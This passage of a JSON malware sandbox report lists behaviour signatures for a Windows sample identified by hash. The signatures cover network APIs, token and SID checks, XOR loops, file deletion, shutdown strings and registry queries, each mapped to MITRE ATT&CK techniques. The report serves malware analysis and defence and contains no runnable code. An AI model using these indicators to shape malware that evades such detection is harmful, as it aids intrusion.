\"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-517", "type": 2, "relevance": 1, "name": "Contains ability to enumerate running processes using Tasklist", "description": "Observed string: \"tasklist.exe\" [Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5]\n Observed string: \"tasklist.exe\" [Source: 00000000-00005304.00000000.173115.00481000.00000002.mdmp]", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: 085cda53603755dc.exe]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-537", "type": 2, "relevance": 1, "name": "Contains ability to create a new HTTP request (API string)", "description": "Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"HttpOpenRequest: host=[%s] method=[%s] path=[%s]\" (Indicator: \"HttpOpenRequest\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"HttpOpenRequest() failed!\" (Indicator: \"HttpOpenRequest\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"HttpOpenRequest: host=[%s] method=[%s] path=[%s]\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")\n Found reference to API \"HttpOpenRequest() failed!\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-228", "type": 2, "relevance": 1, "name": "Contains ability to communicate with C2 using Sockets (API string)", "description": "Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Pattern match: \"http://%s%s\"\n Pattern match: \"https://trying\"\n Heuristic match: \"~dfc95ac5f598668fba.tm\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-539", "type": 2, "relevance": 1, "name": "Contains reference to Windows internet services (API string)", "description": "Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"InternetOpen()\" (Indicator: \"InternetOpen\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"InternetOpen(): %d\" (Indicator: \"InternetOpen\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"InternetOpen()\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")\n Found reference to API \"InternetOpen(): %d\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"http://https://trying\" - Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")\n Found URL \"http://%s%s]\" - Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"HttpQueryInfoA\" (Indicator: \"HttpQueryInfo\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"InternetOpen()\" (Indicator: \"InternetOpen\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"InternetOpen(): %d\" (Indicator: \"InternetOpen\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"InternetConnect() failed!\" (Indicator: \"InternetConnect\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"HttpOpenRequest: host=[%s] method=[%s] path=[%s]\" (Indicator: \"HttpOpenRequest\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"HttpOpenRequest() failed!\" (Indicator: \"HttpOpenRequest\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"HttpSendRequest: failed\" (Indicator: \"HttpSendRequest\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"InternetOpen()\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")\n Found reference to API \"InternetOpen(): %d\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")\n Found reference to API \"InternetConnect() failed!\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")\n Found reference to API \"HttpOpenRequest: host=[%s] method=[%s] path=[%s]\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")\n Found reference to API \"HttpOpenRequest() failed!\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")\n Found reference to API \"HttpSendRequest: failed\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-241", "type": 2, "relevance": 1, "name": "Contains ability to download a file from a URL (API string)", "description": "Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-538", "type": 2, "relevance": 1, "name": "Contains ability to create a HTTP or FTP session (API string)", "description": "Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"InternetConnect() failed!\" (Indicator: \"InternetConnect\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"InternetConnect() failed!\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"HTTP/1.0\" (Indicator: \"HTTP/1.0\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found string \"HTTP/1.0\" (Indicator: \"HTTP/1.0\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "stream-139", "type": 1, "name": "Contains XOR operation loops [Stream disassembly]", "description": "Assembly shows XOR instruction xor edx\n FFFFFFA5h in Stream UID: 00000000-00006044-2687-1846-0040AA1C\n Assembly shows XOR instruction xor edi\n ecx in Stream UID: 00000000-00006044-2687-1846-0040AA1C", "origin": "Hybrid Analysis Technology", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains XOR operation loops [Stream disassembly]", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains XOR operation loops [Stream disassembly]", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: Contains XOR operation loops [Stream disassembly]\n Matched sigs: Contains ability to create a new HTTP request (API string)\n Matched sigs: Found potential URL in binary/memory\n Matched sigs: Found potential URLs in memory dumps\n Matched sigs: Contains ability to communicate with network (API string)\n Matched sigs: Contains ability to create a HTTP or FTP session (API string)", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-114", "type": 2, "relevance": 1, "name": "Contains ability to obtains specified information about the security of a file or directory (API string)", "description": "Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"CreateWellKnownSid\" (Indicator: \"CreateWellKnownSid\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"FreeSid\" (Indicator: \"FreeSid\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"AllocateAndInitializeSid\" (Indicator: \"AllocateAndInitializeSid\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"AllocateAndInitializeSid\" (Indicator: \"InitializeSid\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"EqualSid\" (Indicator: \"EqualSid\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"AllocateAndInitializeSid\" (Indicator: \"AllocateAndInitializeSid\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"AllocateAndInitializeSid\" (Indicator: \"InitializeSid\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"CreateWellKnownSid\" (Indicator: \"CreateWellKnownSid\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"EqualSid\" (Indicator: \"EqualSid\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"FreeSid\" (Indicator: \"FreeSid\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"AllocateAndInitializeSid\" (Indicator: \"AllocateAndInitializeSid\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"AllocateAndInitializeSid\" (Indicator: \"InitializeSid\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"CreateWellKnownSid\" (Indicator: \"CreateWellKnownSid\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"EqualSid\" (Indicator: \"EqualSid\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"FreeSid\" (Indicator: \"FreeSid\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"AllocateAndInitializeSid\" (Indicator: \"AllocateAndInitializeSid\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"AllocateAndInitializeSid\" (Indicator: \"InitializeSid\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"CreateWellKnownSid\" (Indicator: \"CreateWellKnownSid\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"EqualSid\" (Indicator: \"EqualSid\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"FreeSid\" (Indicator: \"FreeSid\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-426", "type": 2, "relevance": 1, "name": "Contains ability to modify file attributes (API string)", "description": "Found reference to API \"SetFileAttributesW\" (Indicator: \"SetFileAttributes\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"SetFileAttributesW\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"SetFileAttributesW\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"SetFileAttributesW\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-132", "type": 2, "relevance": 1, "name": "Contains ability to modify the user configuration/privilege (API string)", "description": "Found reference to API \"SystemParametersInfoA\" (Indicator: \"SystemParametersInfo\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-230", "type": 2, "relevance": 1, "name": "Contains ability to delete registry key/value (API string)", "description": "Found reference to API \"RegDeleteValueW\" (Indicator: \"RegDeleteValue\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"RegDeleteValueW\" (Indicator: \"RegDeleteValue\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"RegDeleteValueW\" (Indicator: \"RegDeleteValue\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"RegDeleteValueW\" (Indicator: \"RegDeleteValue\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HarddiskVolume2\\37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Indicator: \"\\Device\\\"; Source: \"00000000-00005304.00000000.173100.00620000.00000004.mdmp\")\n Found string \"\\Device\\HarddiskVolume2\\Users\\HAPUBWS\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Indicator: \"\\Device\\\"; Source: \"00000000-00006044.00000000.173478.00730000.00000004.mdmp, 00000000-00006044.00000001.175400.00730000.00000004.mdmp, 00000000-00006044.00000002.177325.00730000.00000004.mdmp\")\n Found string \"\\Device\\HarddiskVolume2\\Users\\HAPUBWS\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Indicator: \"\\Device\\\"; Source: \"00000000-00006104.00000000.173155.00650000.00000004.mdmp\")\n Found string \"MSAFD NetBIOS [\\Device\\NetBT_Tcpip6_{90A066FE-591C-47F3-850D-9644B684FBA5}] DATAGRAM 2\" (Indicator: \"\\Device\\\"; Source: \"00000000-00006104.00000000.173155.00650000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-77", "type": 2, "relevance": 1, "name": "Contains ability to modify access token privileges (API string)", "description": "Found reference to API \"CheckTokenMembership\" (Indicator: \"CheckTokenMembership\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"CheckTokenMembership\" (Indicator: \"CheckTokenMembership\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"CheckTokenMembership\" (Indicator: \"CheckTokenMembership\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"CheckTokenMembership\" (Indicator: \"CheckTokenMembership\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileW\" (Indicator: \"DeleteFile\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"DeleteFileW\" (Indicator: \"DeleteFile\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"DeleteFileW\" (Indicator: \"DeleteFile\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"DeleteFileW\" (Indicator: \"DeleteFile\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-87", "relevance": 1, "name": "Imports system security related APIs", "description": "Observed import api \"AllocateAndInitializeSid\" which can \"Allocates and initializes a security identifier (SID) with up to eight subauthorities\" [Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5]\n Observed import api \"CheckTokenMembership\" which can \"Determines whether a specified security identifier (SID) is enabled in an access token\" [Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5]\n Observed import api \"CreateWellKnownSid\" which can \"Creates a SID for predefined aliases\" [Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5]\n Observed import api \"EqualSid\" which can \"Tests two security identifier (SID) values for equality\" [Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5]\n Observed import api \"FreeSid\" which can \"Frees a security identifier (SID) previously allocated by using the AllocateAndInitializeSid function\" [Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5]\n Observed import api \"GetTokenInformation\" which can \"Retrieves a specified type of information about an access token\" [Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5]\n Observed import api \"InitializeSid\" which can \"Initializes a security identifier (SID)\" [Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5]\n Observed import api \"AllocateAndInitializeSid\" which can \"Allocates and initializes a security identifier (SID) with up to eight subauthorities\" [Source: 085cda53603755dc.exe]\n Observed import api \"CheckTokenMembership\" which can \"Determines whether a specified security identifier (SID) is enabled in an access token\" [Source: 085cda53603755dc.exe]\n Observed import api \"CreateWellKnownSid\" which can \"Creates a SID for predefined aliases\" [Source: 085cda53603755dc.exe]\n Observed import api \"EqualSid\" which can \"Tests two security identifier (SID) values for equality\" [Source: 085cda53603755dc.exe]\n Observed import api \"FreeSid\" which can \"Frees a security identifier (SID) previously allocated by using the AllocateAndInitializeSid function\" [Source: 085cda53603755dc.exe]\n Observed import api \"GetTokenInformation\" which can \"Retrieves a specified type of information about an access token\" [Source: 085cda53603755dc.exe]\n Observed import api \"InitializeSid\" which can \"Initializes a security identifier (SID)\" [Source: 085cda53603755dc.exe]", "origin": "Static Parser", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-406", "type": 2, "relevance": 1, "name": "Contains ability to shutdown system", "description": "Observed string: \"shutdown ok\" (Indicator: \"shutdown \") in Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\n Observed string: \"shutdown signal!\" (Indicator: \"shutdown \") in Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\n Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\n Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: 00000000-00005304.00000000.173115.00481000.00000002.mdmp\n Observed string: \"shutdown ok\" (Indicator: \"shutdown \") in Source: 00000000-00005304.00000000.173115.00481000.00000002.mdmp\n Observed string: \"shutdown signal!\" (Indicator: \"shutdown \") in Source: 00000000-00005304.00000000.173115.00481000.00000002.mdmp", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: 